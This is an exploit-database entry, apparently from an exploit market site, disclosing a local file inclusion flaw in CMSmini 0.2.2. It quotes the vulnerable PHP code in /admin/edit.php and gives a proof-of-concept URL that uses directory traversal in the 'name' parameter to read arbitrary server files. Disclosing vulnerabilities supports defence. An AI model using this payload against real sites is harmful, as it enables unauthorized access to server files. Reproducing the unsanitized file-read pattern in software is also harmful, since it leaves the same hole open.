[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CMSmini 0.2.2 Local File Inclusion

Author
i2sec
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17010
Category
web applications
Date add
19-10-2011
Platform
php
# Exploit Title: [CMSmini 0.2.2 Local File Inclusion]
# Date: [2011.10.20]
# Author: [I2Sec5-BSK]
# Software Link: [http://sourceforge.net/projects/cmsmini/]
# Version: [CMSmini 0.2.2]
# Tested on: [Windows XP]
 
--------------------------------------------------
 
/admin/edit.php
 
30 $name = $_GET['name'];
73 $filename = $dirpath.'/'.$name;
74 $fh = fopen($filename, 'r');
75 $data = fread($fh, filesize($filename));
76 fclose($fh);
77 echo $data;
 
---------------------------------------------------
 
POC : http://[ Address ]/admin/edit.php?name=../../../../../../../../../../../../[ Local File ]



#  0day.today [2024-10-05]  #